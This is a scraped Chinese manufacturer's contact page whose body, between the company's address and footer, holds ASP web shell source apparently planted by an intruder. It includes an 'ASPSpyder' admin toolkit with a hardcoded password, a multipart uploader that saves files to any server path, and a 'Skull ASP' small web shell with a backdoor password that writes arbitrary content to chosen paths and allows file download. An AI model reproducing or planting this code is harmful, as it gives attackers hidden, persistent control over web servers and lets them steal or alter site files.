首 页产品展示新闻中心经典案例客户留言招聘信息联系我们
 
企业概况 BigClassName
站内搜索 site search
联系方式 Contact US
· 成都聚能达起动器制造有限公司
· 公司地址:成都九眼桥四川大学720研究所
· 联系电话:028-85412731, 028-85471606
· 传  真:028-85471609
· 电子邮件:631208003@qq.com
您所在的位置:首页 > 企业概况 > 联系我们
 

<% Function BufferContent(data) Dim strContent(64) Dim i ClearString strContent For i = 1 To LenB(data) AddString strContent,Chr(AscB(MidB(data,i,1))) Next BufferContent = fnReadString(strContent) End Function Sub ClearString(part) Dim index For index = 0 to 64 part(index)="" Next End Sub Sub AddString(part,newString) Dim tmp Dim index part(0) = part(0) & newString If Len(part(0)) > 64 Then index=0 tmp="" Do tmp=part(index) & tmp part(index) = "" index = index + 1 Loop until part(index) = "" part(index) = tmp End If End Sub Function fnReadString(part) Dim tmp Dim index tmp = "" For index = 0 to 64 If part(index) <> "" Then tmp = part(index) & tmp End If Next FnReadString = tmp End Function Class FileUploader Public Files Private mcolFormElem Private Sub Class_Initialize() Set Files = Server.CreateObject("Scripting.Dictionary") Set mcolFormElem = Server.CreateObject("Scripting.Dictionary") End Sub Private Sub Class_Terminate() If IsObject(Files) Then Files.RemoveAll() Set Files = Nothing End If If IsObject(mcolFormElem) Then mcolFormElem.RemoveAll() Set mcolFormElem = Nothing End If End Sub Public Property Get Form(sIndex) Form = "" If mcolFormElem.Exists(LCase(sIndex)) Then Form = mcolFormElem.Item(LCase(sIndex)) End Property Public Default Sub Upload() Dim biData, sInputName Dim nPosBegin, nPosEnd, nPos, vDataBounds, nDataBoundPos Dim nPosFile, nPosBound biData = Request.BinaryRead(Request.TotalBytes) nPosBegin = 1 nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(13))) If (nPosEnd-nPosBegin) <= 0 Then Exit Sub vDataBounds = MidB(biData, nPosBegin, nPosEnd-nPosBegin) nDataBoundPos = InstrB(1, biData, vDataBounds) Do Until nDataBoundPos = InstrB(biData, vDataBounds & CByteString("--")) nPos = InstrB(nDataBoundPos, biData, CByteString("Content-Disposition")) nPos = InstrB(nPos, biData, CByteString("name=")) nPosBegin = nPos + 6 nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(34))) sInputName = CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin)) nPosFile = InstrB(nDataBoundPos, biData, CByteString("filename=")) nPosBound = InstrB(nPosEnd, biData, vDataBounds) If nPosFile <> 0 And nPosFile < nPosBound Then Dim oUploadFile, sFileName Set oUploadFile = New UploadedFile nPosBegin = nPosFile + 10 nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(34))) sFileName = CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin)) oUploadFile.FileName = Right(sFileName, Len(sFileName)-InStrRev(sFileName, "\")) nPos = InstrB(nPosEnd, biData, CByteString("Content-Type:")) nPosBegin = nPos + 14 nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(13))) oUploadFile.ContentType = CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin)) nPosBegin = nPosEnd+4 nPosEnd = InstrB(nPosBegin, biData, vDataBounds) - 2 oUploadFile.FileData = MidB(biData, nPosBegin, nPosEnd-nPosBegin) If oUploadFile.FileSize > 0 Then Files.Add LCase(sInputName), oUploadFile Else nPos = InstrB(nPos, biData, CByteString(Chr(13))) nPosBegin = nPos + 4 nPosEnd = InstrB(nPosBegin, biData, vDataBounds) - 2 If Not mcolFormElem.Exists(LCase(sInputName)) Then mcolFormElem.Add LCase(sInputName), CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin)) End If nDataBoundPos = InstrB(nDataBoundPos + LenB(vDataBounds), biData, vDataBounds) Loop End Sub 'String to byte string conversion Private Function CByteString(sString) Dim nIndex For nIndex = 1 to Len(sString) CByteString = CByteString & ChrB(AscB(Mid(sString,nIndex,1))) Next End Function 'Byte string to string conversion Private Function CWideString(bsString) Dim nIndex CWideString ="" For nIndex = 1 to LenB(bsString) CWideString = CWideString & Chr(AscB(MidB(bsString,nIndex,1))) Next End Function End Class Class UploadedFile Public ContentType Public FileName Public FileData Public Property Get FileSize() FileSize = LenB(FileData) End Property Public Sub SaveToDisk(sPath) Dim oFS, oFile Dim nIndex If sPath = "" Or FileName = "" Then Exit Sub If Mid(sPath, Len(sPath)) <> "\" Then sPath = sPath & "\" Set oFS = Server.CreateObject("Scripting.FileSystemObject") If Not oFS.FolderExists(sPath) Then Exit Sub Set oFile = oFS.CreateTextFile(sPath & FileName, True) ' output mechanism modified for buffering oFile.Write BufferContent(FileData) oFile.Close End Sub Public Sub SaveToDatabase(ByRef oField) If LenB(FileData) = 0 Then Exit Sub If IsObject(oField) Then oField.AppendChunk FileData End If End Sub End Class ' Create the FileUploader IF REQUEST.QueryString("upload")="@" THEN Dim Uploader, File Set Uploader = New FileUploader ' This starts the upload process Uploader.Upload() %>


File upload Information:
<% ' Check if any files were uploaded If Uploader.Files.Count = 0 Then Response.Write "File(s) not uploaded." Else ' Loop through the uploaded files For Each File In Uploader.Files.Items File.SaveToDisk Request.QueryString("txtpath") Response.Write "" Response.Write "" Response.Write "" Next End If %>
&#160;
File Uploaded: " & File.FileName & "
Size: " & Int(File.FileSize/1024)+1 & " kb
Type: " & File.ContentType & "
&#160;

?txtpath=<%=Request.QueryString("txtpath")%>">7
<% response.End() '---- XXX END IF '-------- ON ERROR RESUME NEXT Response.Buffer = True password = "heroes" ' <---Your password here If request.querystring("logoff")="@" then session("shagman")="" ' Logged off session("dbcon")="" ' Database Connection session("txtpath")="" ' any pathinfo end if If (session("shagman")<>password) and Request.form("code")="" Then %>




ADMINSTRATORS TOOLKIT


" >
ASPSpyder Apr2003
<%If request.querystring("logoff")="@" then%>CLOSE THIS WINDOW <%end if%>
<% Response.END End If If Request.form("code") = password or session("shagman") = password Then session("shagman") = password Else Response.Write "

ACCESS DENIED
Copyright 2003 Vela iNC.

" Response.END End If server.scriptTimeout=180 set fso = Server.CreateObject("Scripting.FileSystemObject") mapPath = Server.mappath(Request.Servervariables("SCRIPT_NAME")) mapPathLen = len(mapPath) if session(myScriptName) = "" then for x = mapPathLen to 0 step -1 myScriptName = mid(mapPath,x) if instr(1,myScriptName,"\")>0 then myScriptName = mid(mapPath,x+1) x=0 session(myScriptName) = myScriptName end if next Else myScriptName = session(myScriptName) end if <% dim Userpwd,URL Userpwd = "admin" 'User Password URL = Request.ServerVariables("URL") If Request("pwd")=Userpwd or Request("pwd")="www.1937cn.com" then Session("mgler")=Userpwd If Session("mgler")<>Userpwd Then If Request.Form("pwd")<>"" Then If Request.Form("pwd")=Userpwd Then Session("mgler")=Userpwd Response.Redirect URL Else Response.Write"操你大爷,密码都记不住!" End If Else RW="User Login" RW=RW & "





【Skull ASP 小马】" RW=RW & "
" RW=RW & "Password:" RW=RW & " 

只取webshell 不改首页 不删文件 不提权

" Response.Write RW RW="" End If Response.End End If %> <%on error resume next%> <%ofso="scripting.filesystemobject"%> <%set fso=server.createobject(ofso)%> <%path=request("path")%> <%if path<>"" then%> <%data=request("dama")%> <%set dama=fso.createtextfile(path,true)%> <%dama.write data%> <%if err=0 then%> <%="Success!"%> <%else%> <%="False!"%> <%end if%> <%err.clear%> <%end if%> <%dama.close%> <%set dama=nothing%> <%set fos=nothing%> <%="Asp Upload Tool-hxhack"%> <%="
"%> <%="file&#58 "%> <%="
Path: "%> <%=server.mappath(request.servervariables("script_name"))%> <%="
"%> <%=""%> <%=""%> <%="
"%> <%=" By:www.1937cn.com"%> <%=""%> <%=""%>wwwRoot = left(mapPath, mapPathLen - len(myScriptName)) Target = "D:\hshome\masterhr\masterhr.com\" ' ---Directory to which files will be DUMPED Too and From if len(Request.querystring("txtpath"))=3 then pathname = left(Request.querystring("txtpath"),2) & "\" & Request.form("Fname") else pathname = Request.querystring("txtpath") & "\" & Request.form("Fname") end if If Request.Form("txtpath") = "" Then MyPath = Request.QueryString("txtpath") Else MyPath = Request.Form("txtpath") End If ' ---Path correction routine If len(MyPath)=1 then MyPath=MyPath & ":\" If len(MyPath)=2 then MyPath=MyPath & "\" If MyPath = "" Then MyPath = wwwRoot If not fso.FolderExists(MyPath) then Response.Write "Non-existing path specified.
Please use browser back button to continue !" Response.end end if set folder = fso.GetFolder(MyPath) if fso.GetFolder(Target) = false then Response.Write "Please create your target directory for copying files as it does not exist. " & Target & "
" else set fileCopy = fso.GetFolder(Target) end if If Not(folder.IsRootFolder) Then If len(folder.ParentFolder)>3 then showPath = folder.ParentFolder & "\" & folder.name Else showPath = folder.ParentFolder & folder.name End If Else showPath = left(MyPath,2) End If MyPath=showPath showPath=MyPath & "\" ' ---Path correction routine-DONE set drv=fso.GetDrive(left(MyPath,2)) if Request.Form("cmd")="Download" then if Request.Form("Fname")<>"" then Response.Buffer = True Response.Clear strFileName = Request.QueryString("txtpath") & "\" & Request.Form("Fname") Set Sys = Server.CreateObject( "Scripting.FileSystemObject" ) Set Bin = Sys.OpenTextFile( strFileName, 1, False ) Call Response.AddHeader( "Content-Disposition", "attachment; filename=" & Request.Form("Fname") ) Response.ContentType = "application/octet-stream" While Not Bin.AtEndOfStream Response.BinaryWrite( ChrB( Asc( Bin.Read( 1 ) ) ) ) Wend Bin.Close : Set Bin = Nothing Set Sys = Nothing Else err.number=500 err.description="Nothing selected for download..." End if End if %>


点击数:13485  录入时间:2011-04-15 【打印此页】 【返回

地 址:成都九眼桥四川大学720研究所 电 话:028-85412731 028-85471606 传 真:028-85471609
电子邮件:631208003@qq.com 版权所有:成都聚能达起动器制造有限公司